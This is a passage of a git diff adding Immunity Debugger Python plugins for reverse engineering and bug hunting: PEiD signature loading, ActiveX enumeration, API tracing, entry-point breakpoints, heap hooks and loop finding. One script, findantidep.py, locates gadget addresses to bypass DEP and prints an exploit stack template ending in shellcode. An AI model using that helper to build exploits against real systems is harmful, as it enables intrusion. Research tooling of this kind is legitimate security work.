+ #
+ for item in match.items():
+ if item[1] is None :
+ names.append (item[0])
+ matched_names.append(names)
+
+ # If a wildcard is found keep scanning the signature
+ # ignoring the byte.
+ #
+ if match.has_key ('??') :
+ match_tree_alternate = match.get ('??', None)
+ data_remaining = data[idx + 1 :]
+ if data_remaining:
+ matched_names.extend(
+ self.__match_signature_tree(
+ match_tree_alternate, data_remaining, idx+depth+1))
+
+ match = match_next
+
+ # If we have any more packer name in the end of the signature tree
+ # add them to the matches
+ #
+ if match is not None and None in match.values():
+ #names = [idx + depth + 1]
+ names = list()
+ for item in match.items() :
+ if item[1] is None:
+ names.append(item[0])
+ matched_names.append(names)
+
+ return matched_names
+
+
+
+ def load(self , filename=None, data=None):
+ """Load a PEiD signature file.
+
+ Invoking this method on different files combines the signatures.
+ """
+
+ self.__load(filename=filename, data=data)
+
+
+
+ def __load(self, filename=None, data=None):
+
+
+ if filename is not None:
+ # If the path does not exist, attempt to open a URL
+ #
+ if not os.path.exists(filename):
+ try:
+ sig_f = urllib.urlopen(filename)
+ sig_data = sig_f.read()
+ sig_f.close()
+ except IOError:
+ # Let this be raised back to the user...
+ raise
+ else:
+ # Get the data for a file
+ #
+ sig_f = file( filename, 'rt' )
+ sig_data = sig_f.read()
+ sig_f.close()
+ else:
+ sig_data = data
+
+ # Helper function to parse the signature bytes
+ #
+ def to_byte(value) :
+ if value == '??' or value == '?0' :
+ return value
+ return int (value, 16)
+
+
+ # Parse all the singatures in the file
+ #
+ matches = self.parse_sig.findall(sig_data)
+
+ # For each signature, get the details and load it into the
+ # signature tree
+ #
+ for packer_name, signature, ep_only, section_start_only in matches:
+
+ ep_only = ep_only.strip().lower()
+
+ signature = signature.replace('\\n', '').strip()
+
+ signature_bytes = [to_byte(b) for b in signature.split()]
+
+ if ep_only == 'true':
+ ep_only = True
+ else:
+ ep_only = False
+
+
+ if section_start_only == 'true':
+ section_start_only = True
+ else:
+ section_start_only = False
+
+
+ depth = 0
+
+ if section_start_only is True:
+
+ tree = self.signature_tree_section_start
+ self.signature_count_section_start += 1
+
+ else:
+ if ep_only is True :
+ tree = self.signature_tree_eponly_true
+ self.signature_count_eponly_true += 1
+ else :
+ tree = self.signature_tree_eponly_false
+ self.signature_count_eponly_false += 1
+
+ for idx, byte in enumerate (signature_bytes) :
+
+ if idx+1 == len(signature_bytes):
+
+ tree[byte] = tree.get( byte, dict() )
+ tree[byte][packer_name] = None
+
+ else :
+
+ tree[byte] = tree.get ( byte, dict() )
+
+ tree = tree[byte]
+ depth += 1
+
+ if depth > self.max_depth:
+ self.max_depth = depth
diff --git a/1.73/PyCommands/activex.py b/1.73/PyCommands/activex.py
new file mode 100755
index 0000000..654db9f
--- /dev/null
+++ b/1.73/PyCommands/activex.py
@@ -0,0 +1,168 @@
+"""
+(c) 2007 Justin Seitz - jms@bughunter.ca
+
+This is just a little script for ImmunityDebugger that will resolve
+exposed COM functions to their relative address. Check usage for some TODO items.
+
+NOTE: Requires comtypes http://sourceforge.net/projects/comtypes/
+"""
+from ctypes import *
+from ctypes.wintypes import *
+try:
+ from comtypes import *
+ from comtypes.typeinfo import *
+ from comtypes.automation import *
+except ImportError:
+ raise ExceptionError, "Comtypes library needed"
+
+from immlib import *
+
+ole32 = windll.ole32
+kernel32 = windll.kernel32
+
+class MEMORY_BASIC_INFORMATION(Structure):
+
+ _fields_ = [
+ ('BaseAddress', c_void_p),
+ ('AllocationBase', c_void_p),
+ ('AllocationProtect', c_ulong),
+ ('RegionSize', c_ulong),
+ ('State', c_ulong),
+ ('Protect', c_ulong),
+ ('Type', c_ulong),
+]
+
+def get_linear_address(address):
+
+ mbi = MEMORY_BASIC_INFORMATION()
+ kernel32.VirtualQuery(address,byref(mbi),sizeof(mbi))
+ return mbi.AllocationBase
+
+def enum_type_info_members(p_iref_type_info,p_reftype_attr,p_iunknown,imm, base_addr):
+
+ if p_reftype_attr.cFuncs == 0:
+ return
+
+ vtable = 0x0
+ code_base = imm.getKnowledge("codebase")
+
+ for i in range(p_reftype_attr.cFuncs):
+
+ func_desc = p_iref_type_info.GetFuncDesc(i)
+ method_name = p_iref_type_info.GetNames(func_desc.memid)
+ inv_kind = func_desc.invkind
+
+
+ lpVtbl = cast(p_iunknown, POINTER(POINTER(c_void_p)))
+
+ value = get_linear_address(lpVtbl[0][func_desc.oVft])
+ if str(method_name[0]) == "QueryInterface":
+ import struct
+ address = (((lpVtbl[0][i])-(value+0x1000)))
+ address = address + code_base
+ #activex = activex.split(".")[0]
+ pages = imm.getMemoryPagebyOwnerAddress( base_addr ) # workaround
+ for page in pages:
+ mem = page.getMemory()
+ ndx = mem.find( struct.pack("L", address) )
+ if ndx != -1:
+ vtable = page.getBaseAddress() + ndx
+ break
+
+ #imm.Log("values %s" % str(method_name[0]))
+
+ if value is not None and lpVtbl[0][i] is not None:
+
+ if func_desc.invkind == INVOKE_FUNC or func_desc.invkind == INVOKE_PROPERTYPUT or func_desc.invkind == INVOKE_PROPERTYPUTREF:
+ address = (((lpVtbl[0][i])-(value+0x1000)))
+
+ address = address + code_base
+ else:
+ if func_desc.invkind == INVOKE_FUNC or func_desc.invkind == INVOKE_PROPERTYPUT or func_desc.invkind == INVOKE_PROPERTYPUTREF:
+ try:
+ address = imm.readLong( vtable + i*4)
+ except Exception:
+ address = 0
+ imm.Log("Method: %s Address: 0x%08x" % (str(method_name[0]),address),address)
+
+def usage(imm):
+
+ imm.Log("This is a helper for RE/bughunting ActiveX controls.")
+ imm.Log("!activex - this outputs all functions and their addresses.")
+ imm.Log("!activex break - set a breakpoint on a function name.")
+ imm.Log("!activex exec - call the function internally.")
+ imm.Log("!activex fuzz - fuzz this function.")
+
+
+def main(args):
+ imm = Debugger()
+
+ try:
+ if args[0]:
+ if len(args) > 1:
+ if args[1]:
+
+ if args[1] == "break":
+ mode = "break_on_func"
+ func = args[2]
+
+ if args[1] == "exec":
+ mode = "exec_func"
+ func = args[2]
+
+ if args[1] == "fuzz":
+ mode = "fuzz_func"
+ func = args[2]
+
+ else:
+ activex = args[0]
+ else:
+ usage(imm)
+ return "Usage Information Outputted"
+ except:
+ usage(imm)
+ return "Usage Inforamtion Outputted"
+
+ module = imm.getModule(activex)
+ imm.addKnowledge("codebase",module.getCodebase(),force_add=1)
+
+ tlib = LoadTypeLib(module.getPath())
+
+ ticount = tlib.GetTypeInfoCount()
+
+ i = 0
+
+ while i < ticount:
+
+ p_itype_info = tlib.GetTypeInfo(i)
+
+ if p_itype_info:
+ p_type_attr = p_itype_info.GetTypeAttr()
+
+ if p_type_attr.typekind is TKIND_COCLASS:
+
+ for ref in range(p_type_attr.cImplTypes):
+ h_ref_type = p_itype_info.GetRefTypeOfImplType(ref)
+
+ if h_ref_type:
+
+ p_iref_type_info = p_itype_info.GetRefTypeInfo(h_ref_type)
+
+ if p_iref_type_info:
+ p_reftype_attr = p_iref_type_info.GetTypeAttr()
+ imm.Log("CLSID: %s " % str(p_type_attr.guid))
+ #try:
+
+ p_iunknown = CoCreateInstance(p_type_attr.guid)
+ #except:
+ # pass
+
+ if p_iunknown:
+
+ enum_type_info_members(p_iref_type_info,p_reftype_attr,p_iunknown,imm, module.getBaseAddress())
+
+
+
+ i+=1
+
+ return "ActiveX Methods Trapped"
diff --git a/1.73/PyCommands/apitrace.py b/1.73/PyCommands/apitrace.py
new file mode 100755
index 0000000..8035d4a
--- /dev/null
+++ b/1.73/PyCommands/apitrace.py
@@ -0,0 +1,104 @@
+# apitrace PyCommand - (c)Immunity Inc.
+# Justin Seitz
+# TODO:
+# - dereference stack params if the function doesn't contain symbols
+
+from immlib import *
+
+class ExportHooks(LoadDLLHook):
+
+ def __init__(self):
+ LoadDLLHook.__init__(self)
+ self.imm = Debugger()
+ self.hooker = InterCallHook()
+
+ def run(self, regs):
+
+ # We gotta new DLL loaded, time to find all it's functions
+ # and set breakpoints on them, hopefully to bypass the pain
+ # of having to rebuild IATs.
+ event = self.imm.getEvent()
+ self.imm.Log("Module that just got loaded: %s" % event.lpImageName)
+ #module = self.imm.getModule( event.lpImageName )
+
+ # Force analysis
+ self.imm.analyseCode( module.getCodebase() )
+
+ # Now walk all the functions and set breakpoints on the functions
+ # that we can resolve correctly
+ function_list = self.imm.getAllFunctions( module.getCodebase() )
+
+ for i in function_list:
+
+ function = self.imm.getFunction( i )
+ function_name = self.imm.decodeAddress( i )
+
+ # Now we add all of our breakpoints to the main hook
+ self.hooker.add( function_name, i )
+
+
+class InterCallHook(LogBpHook):
+
+ def __init__(self):
+ LogBpHook.__init__(self)
+ self.imm = Debugger()
+
+ def run(self, regs):
+
+ # We have hit the function head, now we decode
+ # the function and all of its parameters, quite handy
+ call_stack = self.imm.callStack()
+
+
+ # Now we just do some funky workarounds to make sure
+ # we are decoding the information correctly
+ main_call = False
+
+ for i in call_stack:
+
+ if i.getProcedure().startswith(" ") == False:
+ if main_call == True:
+ break
+ else:
+ main_call == True
+ self.imm.Log("")
+ self.imm.Log("Function Call -> %s" % i.getProcedure(), address = regs['EIP'])
+ else:
+ self.imm.Log("%s" % i.getProcedure() )
+
+def main(args):
+
+ imm = Debugger()
+
+ # Find all intermodular commands in the executable
+ # and set a logging BP hook on them. Ignore all calls
+ # to Rtl* as they need to be instrumented with fast hooks
+ module = imm.getModule( imm.getDebuggedName() )
+
+ # We use a LoadDLLHook so that if libraries get added
+ # we automagically add the new functions to the global hook
+ loaddll_hook = ExportHooks()
+ loaddll_hook.add("Generic DLL handler.")
+
+ hooker = InterCallHook()
+
+ if not module.isAnalysed():
+ imm.analyseCode( module.getCodebase() )
+
+ call_list = imm.getInterCalls( module.getCodebase() )
+
+ for call in call_list.keys():
+
+ function_name = imm.decodeAddress( int(call_list[call][0][2]) )
+
+ # Skip any Rtl* calls, we are just splitting a string like kernel32.LoadLibraryA
+ if function_name.split(".")[1].startswith("Rtl"):
+ continue
+
+ hooker.add( function_name, call_list[call][0][2] )
+
+
+ imm.Log("From: 0x%08x -> To: 0x%08x (decoded: %s) " % (int(call),int(call_list[call][0][2]),function_name))
+
+
+ return "[*] All intermodular calls found and hooked."
\ No newline at end of file
diff --git a/1.73/PyCommands/bpxep.py b/1.73/PyCommands/bpxep.py
new file mode 100755
index 0000000..82fb22f
--- /dev/null
+++ b/1.73/PyCommands/bpxep.py
@@ -0,0 +1,170 @@
+#!/usr/bin/env python
+
+#-------------------------------------------------------------------------------
+#
+# By BoB -> Team PEiD
+# http://www.SecretAsHell.com/BobSoft/
+# BobSoft@GMail.Com
+#
+#-------------------------------------------------------------------------------
+#
+# Thanks to JMS for some TLS code used in this script .. ;)
+#
+#-------------------------------------------------------------------------------
+#
+# V1.01
+# Fixed a missing var in getAddressInTlsCallbacks() ..
+#
+#-------------------------------------------------------------------------------
+
+import immlib
+import pefile
+
+__VERSION__ = '1.01'
+DESC = "Sets a breakpoint on entrypoint of main module .."
+ProgName = 'BpxEP'
+ProgVers = __VERSION__
+
+
+#-------------------------------------------------------------------------------
+
+def usage(imm):
+ imm.Log(" ")
+ imm.Log("%s v%s By BoB -> Team PEiD" % (ProgName, ProgVers),focus=1, highlight=1)
+ imm.Log("Description:")
+ imm.Log(" Sets Breakpoint on entrypoint of main module and optionally runs until entrypoint reached ..")
+ imm.Log(" For use when a packed file fails to stop at entrypoint, EG [MSLRH], UPack ..")
+ imm.Log(" Debugging these files results in ImmDbg starting at system startup breakpoint ..")
+ imm.Log(" Also there is ability to place breakpoint at TLS callbacks, this is for packers that")
+ imm.Log(" run code from TLS callbacks, or unpack from TLS, EG: ASDPack v1.0 ..")
+ imm.Log(" With ASDPack the target PE File loaded into ImmDbg will run instead of stopping, so ")
+ imm.Log(" you must set Debugging Options -> Event -> Start at system breakpoint - then run script")
+ imm.Log(" with -tls and -go params.. ")
+ imm.Log(" ")
+ imm.Log("Usage:")
+ imm.Log(" !%s [-go] [-tls]" % ProgName.lower())
+ imm.Log(" ")
+ imm.Log("Options:")
+ imm.Log(" -go : After setting breakpoint on EP, run (F9)")
+ imm.Log(" -tls : Set Bpx on TLS callbacks too .. (Uses code by JMS)")
+ imm.Log(" ")
+ return "See log window (Alt-L) for usage .. "
+
+
+#-------------------------------------------------------------------------------
+# Some of this TLS code from JMS, thanks :)
+# Returns 0 if no callbacks, else address of first callback ..
+
+def hasTlsCallbacks(pe, imm):
+ addr = 0
+ # Maybe no TLS table ?
+ if hasattr(pe, "DIRECTORY_ENTRY_TLS"):
+ tls_callbacks_table = pe.DIRECTORY_ENTRY_TLS.struct.AddressOfCallBacks
+ # Maybe no TLS callbacks pointer?
+ if tls_callbacks_table:
+ addr = imm.readLong(tls_callbacks_table)
+ # Maybe has TLS table, has Callbacks pointer, but points to null .. (Delphi does this)
+ if addr != 0:
+ return tls_callbacks_table
+ return addr
+
+
+#-------------------------------------------------------------------------------
+# Returns fixed callback address if imagebase changed ..
+
+def getAddressInTlsCallbacks(pe, imm, index):
+ # This was missing in v.00 .. ;/
+ addr = 0
+ a = hasTlsCallbacks(pe, imm)
+ if a != 0:
+ addr = imm.readLong(a + (index * 4)) # Zero-Based index !
+ # Maybe relocated ?
+ if imm.getModule(imm.getDebuggedName()).getBaseAddress() != pe.OPTIONAL_HEADER.ImageBase:
+ # Fix the TLS Callback Virtual Address ..
+ addr = (addr - pe.OPTIONAL_HEADER.ImageBase) + imm.getModule(imm.getDebuggedName()).getBaseAddress()
+ return addr
+
+
+#-------------------------------------------------------------------------------
+
+def isAddressInTlsCallbacks(pe, imm, addr):
+ for i in range(1000):
+ TlsAddr = getAddressInTlsCallbacks(pe, imm, i)
+ if TlsAddr == addr:
+ return True
+ if TlsAddr == 0:
+ return False
+
+
+#-------------------------------------------------------------------------------
+
+def main(args):
+ imm = immlib.Debugger()
+ Mod = imm.getModule(imm.getDebuggedName())
+ pe = pefile.PE(name=Mod.getPath())
+ ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint + Mod.getBaseAddress()
+ imm.Log(" ")
+ imm.Log("%s v%s By BoB -> Team PEiD" % (ProgName, ProgVers), highlight=1)
+
+ TlsBpx = False
+ RunAfter = False
+ if args:
+ for i in range(len(args)):
+ if (args[i].lower() == "-tls"):
+ TlsBpx = not TlsBpx
+ if (args[i].lower() == "-go"):
+ RunAfter = not RunAfter
+
+ if TlsBpx == True:
+ # Do we have a Tls table and callbacks ?
+ addr = getAddressInTlsCallbacks(pe, imm, 0)
+ if (addr == 0):
+ # Stop and display error, else we could be running with -go .. :/
+ imm.Log("This file has no TLS callbacks ..")
+ imm.Log(" ")
+ return "There were errors, please see log window (Alt-L)"
+
+ count = 0
+ while addr != 0:
+ imm.setTemporaryBreakpoint(addr)
+ count += 1
+ imm.Log("Set Breakpoint on TLS callback #%d .." % count, address=addr)
+ imm.setComment(addr, "TLS callback #%d" % count)
+ addr = getAddressInTlsCallbacks(pe, imm, count)
+
+ # Get current EIP in ImmDbg ..
+ EIP = imm.getCurrentAddress()
+ # User error check .. :)
+ if EIP != ep:
+ imm.setTemporaryBreakpoint(ep)
+ imm.Log("Breakpoint set at EntryPoint ..", address=ep)
+ imm.setComment(ep, "EntryPoint of \"%s\" .. " % imm.getDebuggedName())
+ # Only run if not at EP .. :)
+ if RunAfter == True:
+ imm.Log("Running ..")
+ imm.Run()
+ else:
+ imm.Log("You are already at entrypoint ..")
+ imm.Log(" ")
+ return "Program entry point"
+
+ imm.Log(" ")
+
+ EIP = imm.getCurrentAddress()
+ # If we ran then we should be at EP ..
+ if EIP == ep:
+ if imm.isAnalysed(ep) == 0:
+ # Try to analyse code at entrypoint ..
+ imm.analyseCode(ep)
+ return "Program entry point"
+
+ # Maybe we have hit a TLS Callback ?
+ elif isAddressInTlsCallbacks(pe, imm, EIP):
+ if imm.isAnalysed(EIP) == 0:
+ # Try to analyse code at callback entrypoint ..
+ imm.analyseCode(EIP)
+ return imm.getComment(EIP)
+
+ else:
+ return "Breakpoint set at EntryPoint of \"%s\" .." % imm.getDebuggedName()
+
diff --git a/1.73/PyCommands/chunkanalizehook.py b/1.73/PyCommands/chunkanalizehook.py
new file mode 100755
index 0000000..1ecdc23
--- /dev/null
+++ b/1.73/PyCommands/chunkanalizehook.py
@@ -0,0 +1,151 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+"""
+
+import immlib
+import getopt
+from libheap import *
+from immlib import LogBpHook
+import libdatatype
+
+DESC = "Analize a Specific Chunk at a specific moment"
+
+def usage(imm):
+ imm.Log("!chunkanalizehook -a ADDRESS < exp >", focus=1)
+ imm.Log(" ADDRESS of the place where you want to set a hook")
+ imm.Log(" < exp > expression to calculate the chunk address")
+ imm.Log("ex: !chunkanalizehook -a 0x1006868 EDI - 4")
+
+FunctionsType = [ "+", "-", "*", "/", "&", "^"]
+
+# Hook and Dump some Chunks based on the Expression
+class HookAndInform(LogBpHook):
+ Functions = { "+": lambda a,b: a+b,
+ "-": lambda a,b: a-b,
+ "*": lambda a,b: a*c,
+ "/": lambda a,b: a/c,
+ "&": lambda a,b: a&c,
+ "^": lambda a,b: a^c
+ }
+
+ def __init__(self, exp, discover = False, nchunks = 3, heap = 0):
+ LogBpHook.__init__(self)
+ self.Expression = exp
+ self.discover = discover
+ self.nchunks = nchunks
+ self.heap = heap
+
+
+ def run(self, regs):
+ imm = immlib.Debugger()
+
+ accumulator = 0
+ second = 0
+ func = '+'
+ # Calculate the Chunk Address based on the Expression
+ for value in self.Expression:
+ if value in self.Functions.keys():
+ func = value
+ else:
+ if type(value) == type(0):
+ second = value
+ elif regs.has_key(value.upper()):
+ second = regs[ value.upper() ]
+ elif value[0]=='[' and value[-1] ==']' and regs.has_key(value[1:-1].upper()):
+ second = imm.readLong( regs[ value[1:-1].upper()] )
+ else:
+
+ self.unHook()
+ accumulator = self.Functions[func]( accumulator, second)
+ imm.Log("> Hit Hook 0x%08x, checking chunk: 0x%08x" % (self.address, accumulator), address = accumulator)
+ imm.Log("=" * 47)
+
+ pheap = PHeap( imm, self.heap )
+ plookaddr = 0
+ if self.heap:
+ plookaddr = pheap.Lookaside
+ hlook = None
+ if plookaddr:
+ hlook = PHeapLookaside( imm, plookaddr )
+ dt = None
+ if self.discover:
+ dt = libdatatype.DataTypes(imm)
+ pheap = PHeap( imm )
+ for chk in pheap.getChunks( accumulator, self.nchunks ):
+ if chk.size < 0x7F and hlook:
+ l = hlook[ chk.size ]
+ if not l.isEmpty():
+ if chk.addr+8 in l.getList():
+ imm.Log("- LOOKASIDE -")
+ chk.printchunk(uselog = imm.Log, dt = dt)
+ imm.Log("=-" * 0x23 + "=")
+
+
+
+def main(args):
+ imm = immlib.Debugger()
+ if not args:
+ usage(imm)
+ return "Wrong Arguments (Check usage on the Log Window)"
+ try:
+ opts, argo = getopt.getopt(args, "h:n:a:d")
+ except getopt.GetoptError:
+ return "Wrong Arguments (Check usage on the Log Window)"
+
+ address = None
+ expression = argo
+ discover = False
+ nchunks = 3
+ heap = 0
+
+ for o,a in opts:
+ if o == '-a':
+ try:
+ address = int( a, 16 )
+ except ValueError:
+ usage(imm)
+ return "Wrong Address (%s) % " % a
+ elif o == '-d':
+ discover = True
+ elif o == '-n':
+ nchunks = int( a, 16 )
+ elif o == '-h':
+ heap = int( a, 16 )
+
+ imm.Log("Expression: %s" % argo)
+ if not address and not expression:
+ usage( imm )
+ return "Wrong usage (Check usage on the Log Window)"
+
+ accumulator = 0
+ func = '+'
+ regs = {'EIP': 0L, 'ESP': 0L, 'EDI': 0L, 'EAX': 0L, 'EBP': 0L, 'EDX': 0L, 'EBX': 0L, 'ESI': 0L, 'ECX': 0L}
+ # normalizing and checking the expression
+ for ndx in range(0, len(expression) ):
+ value = expression[ndx]
+ if value not in FunctionsType:
+ if value.upper() in regs.keys():
+ expression[ndx] = value.upper()
+ elif value[0]=='[' and value[-1] ==']' and regs.has_key(value[1:-1].upper()):
+ expression[ndx] = value.upper()
+ else:
+ try:
+ value = int(value, 16)
+ expression[ndx] = value
+ except ValueError:
+ imm.Log("Wrong Argument: %s" % value)
+ return "Wrong Argument, Hook not setted"
+
+ imm.Log("Hooking on expression: '%s'" % str(expression) )
+
+ hook = HookAndInform( expression, discover, nchunks = nchunks, heap = heap )
+ hook.add("hook_inform_0x%08x" % address, address)
+ return "Hooked on 0x%08x" % address
+
+
+
diff --git a/1.73/PyCommands/cmpmem.py b/1.73/PyCommands/cmpmem.py
new file mode 100755
index 0000000..b2829aa
--- /dev/null
+++ b/1.73/PyCommands/cmpmem.py
@@ -0,0 +1,69 @@
+#!/usr/bin/env python
+
+"""
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+"""
+
+import immlib
+from libheap import *
+import getopt, string
+import immutils
+
+DESC = "Compare memory with a file (file been a dump from prettyhexprint)"
+
+def main(args):
+ imm = immlib.Debugger()
+ address = 0x0
+ file = None
+ try:
+ opts, argo = getopt.getopt(args, "a:f:")
+ except getopt.GetoptError:
+ imm.setStatusBar("Usage: !cmpmem -a ADDRESS -f FILETOCMP" % str(args))
+ return 0
+
+ for o,a in opts:
+ if o == "-a":
+ try:
+ address = int(a, 16)
+ except ValueError, msg:
+
+ imm.setStatusBar( "Invalid heap address: %s" % a )
+ return 0
+ if o == "-f":
+ try:
+ file = a
+ except ValueError, msg:
+ imm.setStatusBar( "Invalid heap address: %s" % a )
+ return 0
+
+ if file and address:
+ lines = open(file).readlines()
+ fmem = []
+ for line in lines:
+ line = line.strip().split(" ")
+ for number in line:
+ try:
+ fmem.append( chr( int(number, 16) ) )
+ except ValueError:
+ continue
+ fmem = fmem
+ mem = imm.readMemory(address, len(fmem) )
+ for a in range(0, len(fmem)):
+ try:
+ if fmem[a] != mem[a]:
+ imm.setStatusBar("Unmatched: Check log window for the dump")
+ imm.Log("Unmatched at offset: %d" % a)
+ imm.Log(" File: %s" % immutils.prettyhexprint( string.joinfields(fmem[ a: a + 8 ], "") ) )
+ imm.Log(" Mem : %s" % immutils.prettyhexprint( mem[ a: a + 8 ] ) )
+ return 0x0
+ except IndexError:
+ imm.setStatusBar("Unmatched: Check log window for the dump")
+ imm.Log("Unmatch: Different string sizes= File: %d Memory: %d" % (len(fmem), len(mem)) )
+ return 0x0
+
+ imm.setStatusBar("Match!")
+ imm.Log("Match!")
+ return 0
\ No newline at end of file
diff --git a/1.73/PyCommands/dependencies.py b/1.73/PyCommands/dependencies.py
new file mode 100755
index 0000000..68c89d8
--- /dev/null
+++ b/1.73/PyCommands/dependencies.py
@@ -0,0 +1,23 @@
+"""pycmd example"""
+
+DESC="""Find a exported function on the loaded dll"""
+
+import immlib
+def usage(imm):
+ imm.Log("!dependencies Find an exported function on the loaded dll")
+ imm.Log("!dependencies module.function")
+ imm.Log("ex: !dependencies rpcrt4.rpcserveruseprotseqw")
+
+def main(args):
+ imm=immlib.Debugger()
+ if len(args) !=1:
+ usage(imm)
+ return "Error: Wrong arguments"
+
+ result = imm.findDependecies( [ args[0] ] )
+ ret = 0
+ for modname in result.keys():
+ for mod in result[modname]:
+ imm.Log("Found: %20s on %s" % (modname, mod.name), address = mod.address)
+ ret +=1
+ return "Found %d dependencies" % ret
\ No newline at end of file
diff --git a/1.73/PyCommands/duality.py b/1.73/PyCommands/duality.py
new file mode 100755
index 0000000..4fc8471
--- /dev/null
+++ b/1.73/PyCommands/duality.py
@@ -0,0 +1,49 @@
+import immlib, immutils
+
+DESC = "Looks for mapped address that can be 'transformed' into opcodes"
+
+def str2int24_swapped( value ):
+ return istr2int( value + "\x00" )
+
+def usage(imm):
+ imm.Log("!duality Looks for mapped address that can be 'transformed' into opcodes")
+ imm.Log("!duality ")
+
+
+def main(args):
+ imm = immlib.Debugger()
+ found = 0
+ searchf = {1:ord, 2: immutils.str2int16_swapped,\
+ 3:str2int24_swapped}
+ searchm = {1:0xff, 2:0xffff, 3: 0xffffff}
+
+ code = imm.Assemble( " ".join(args) )
+ mask = len(code)
+ currentmask = searchm[mask]
+
+ try:
+ what = searchf[ mask ]( code )
+ except KeyError:
+ return "Error, Code too big"
+
+ imm.Log("What: 0x%08x -> %s" % (what, " ".join(args)) )
+ imm.getMemoryPages()
+
+ for a in imm.MemoryPages.keys():
+
+ mem = imm.MemoryPages[a]
+ size = mem.getSize()
+ start = mem.getBaseAddress()
+ end = start + size
+
+ ouraddr = ( start & ~currentmask) | what
+
+ if ouraddr > start and ouraddr < end:
+ imm.Log("Found: 0x%08x %s" % (ouraddr, mem.getSection()), address = ouraddr)
+ found+=1
+ else:
+ ouraddr+= currentmask+1
+ if ouraddr > start and ouraddr < end:
+ imm.Log("Found: 0x%08x (%s)" % ( ouraddr, mem.getSection() ), address = ouraddr)
+ found+=1
+ return "Addresses founded: %d (Check the Log Window)" % found
\ No newline at end of file
diff --git a/1.73/PyCommands/findantidep.py b/1.73/PyCommands/findantidep.py
new file mode 100755
index 0000000..d0965ec
--- /dev/null
+++ b/1.73/PyCommands/findantidep.py
@@ -0,0 +1,48 @@
+
+import immlib
+import immutils
+
+def tAddr(addr):
+ buf = immutils.int2str32_swapped(addr)
+ return "\\x%02x\\x%02x\\x%02x\\x%02x" % ( ord(buf[0]) , ord(buf[1]), ord(buf[2]), ord(buf[3]) )
+
+DESC="""Find address to bypass software DEP"""
+
+def main(args):
+ imm=immlib.Debugger()
+ addylist = []
+ mod = imm.getModule("ntdll.dll")
+ if not mod:
+ return "Error: Ntdll.dll not found!"
+
+ # Finding the first ADDRESS
+ ret = imm.searchCommands("MOV AL,1\nRET")
+ if not ret:
+ return "Error: Sorry, the first addy cannot be found"
+ for a in ret:
+ addylist.append( "0x%08x: %s" % (a[0], a[2]) )
+ ret = imm.comboBox("Please, choose the First Address [sets AL to 1]", addylist)
+ firstaddy = int(ret[0:10], 16)
+ imm.Log("First Address: 0x%08x" % firstaddy, address = firstaddy)
+
+ # Finding the Second ADDRESS
+ ret = imm.searchCommandsOnModule(mod.getBase(), "CMP AL,0x1\n PUSH 0x2\n POP ESI\n" )
+ if not ret:
+ return "Error: Sorry, the second addy cannot be found"
+ secondaddy = ret[0][0]
+ imm.Log( "Second Address %x" % secondaddy , address= secondaddy)
+
+ # Finding the Third ADDRESS
+ ret = imm.inputBox("Insert the Asm code to search for")
+ ret = imm.searchCommands(ret)
+ if not ret:
+ return "Error: Sorry, the third address cannot be found"
+ addylist = []
+ for a in ret:
+ addylist.append( "0x%08x: %s" % (a[0], a[2]) )
+ ret = imm.comboBox("Please, choose the Third return Address [jumps to shellcode]", addylist)
+ thirdaddy = int(ret[0:10], 16)
+ imm.Log( "Third Address: 0x%08x" % thirdaddy, thirdaddy )
+ imm.Log( 'stack = "%s\\xff\\xff\\xff\\xff%s\\xff\\xff\\xff\\xff" + "A" * 0x54 + "%s" + shellcode ' %\
+ ( tAddr(firstaddy), tAddr(secondaddy), tAddr(thirdaddy) ) )
+
\ No newline at end of file
diff --git a/1.73/PyCommands/finddatatype.py b/1.73/PyCommands/finddatatype.py
new file mode 100755
index 0000000..f810c8c
--- /dev/null
+++ b/1.73/PyCommands/finddatatype.py
@@ -0,0 +1,38 @@
+"""funsniff"""
+
+DESC="""funsniff """
+
+import immlib
+import immutils
+import libdatatype
+
+def usage(imm):
+ imm.Log("!finddatatype ")
+ imm.Log("!finddatatype ADDRESS SIZE")
+ return "Usage: !finddatatype ADDRESS SIZE"
+
+def main(args):
+ imm = immlib.Debugger()
+ if not args:
+ return usage( imm )
+ if len( args ) != 2:
+ return usage( imm )
+
+ addr = int(args[0], 16)
+ size = int(args[1], 16)
+
+ dt = libdatatype.DataTypes(imm)
+ mem = imm.readMemory( addr, size )
+ if not mem:
+ return "Error: Couldn't read anything at address: 0x%08x" % addr
+
+ ret = dt.Discover( mem, addr, what = 'all' )
+ imm.Log( "Found: %d data types" % len(ret) )
+
+ for obj in ret:
+ t = "obj: %d" % obj.size
+ if obj.data:
+ msg = obj.Print()
+ imm.Log( "obj: %s: %s %d" % (obj.name, msg, obj.getSize() ), address = obj.address)
+
+ return "Found: %d data types" % len(ret)
\ No newline at end of file
diff --git a/1.73/PyCommands/findloop.py b/1.73/PyCommands/findloop.py
new file mode 100755
index 0000000..7d371ae
--- /dev/null
+++ b/1.73/PyCommands/findloop.py
@@ -0,0 +1,69 @@
+"""
+(c) Immunity, Inc. 2004-2008
+
+
+U{Immunity Inc.}
+
+findloop
+
+"""
+
+
+from immlib import *
+from immutils import *
+import getopt
+
+DESC=""" Find natural loops given a function start address """
+
+def usage(imm):
+ imm.Log("!findloop -a ")
+ imm.Log("-a (function start address)")
+ imm.Log("-h This help")
+ return "Errror!"
+
+
+def main(args):
+ imm = Debugger()
+ try:
+ opts,argo = getopt.getopt(args, "a:")
+ except:
+ return usage(imm)
+ for o,a in opts:
+ if o == "-a":
+ loops = imm.findLoops(int(a,16))
+ for loop in loops:
+ imm.Log("LOOP! from:0x%08x, to:0x%08x"%(loop[0],loop[1]),loop[0])
+
+ func = imm.getFunction(int(a,16))
+ bbs = func.getBasicBlocks()
+
+ #find first and last node
+ first = 0xffffffff
+ last = 0
+ for node in loop[2]:
+ if node < first: first = node
+ if node > last: last = node
+
+ #mark loop nodes, but NOT change anything if there's any kind of comment
+ for node in loop[2]:
+ imm.Log(" Loop node:0x%08x"%node,node)
+ for bb in bbs:
+ if bb.getStart() == node:
+ instrs = bb.getInstructions(imm)
+ for op in instrs:
+ if not imm.getComment(op.getAddress()) and op.getAddress() != node:
+ if node == last and op.getAddress() == instrs[-1].getAddress():
+ #last instruction of last node
+ imm.setComment(op.getAddress(), "/")
+ else:
+ imm.setComment(op.getAddress(), "|")
+
+ if not imm.getComment(node):
+ if node == first:
+ imm.setComment(node, "\ Loop 0x%08X Node"%(loop[0]))
+ else:
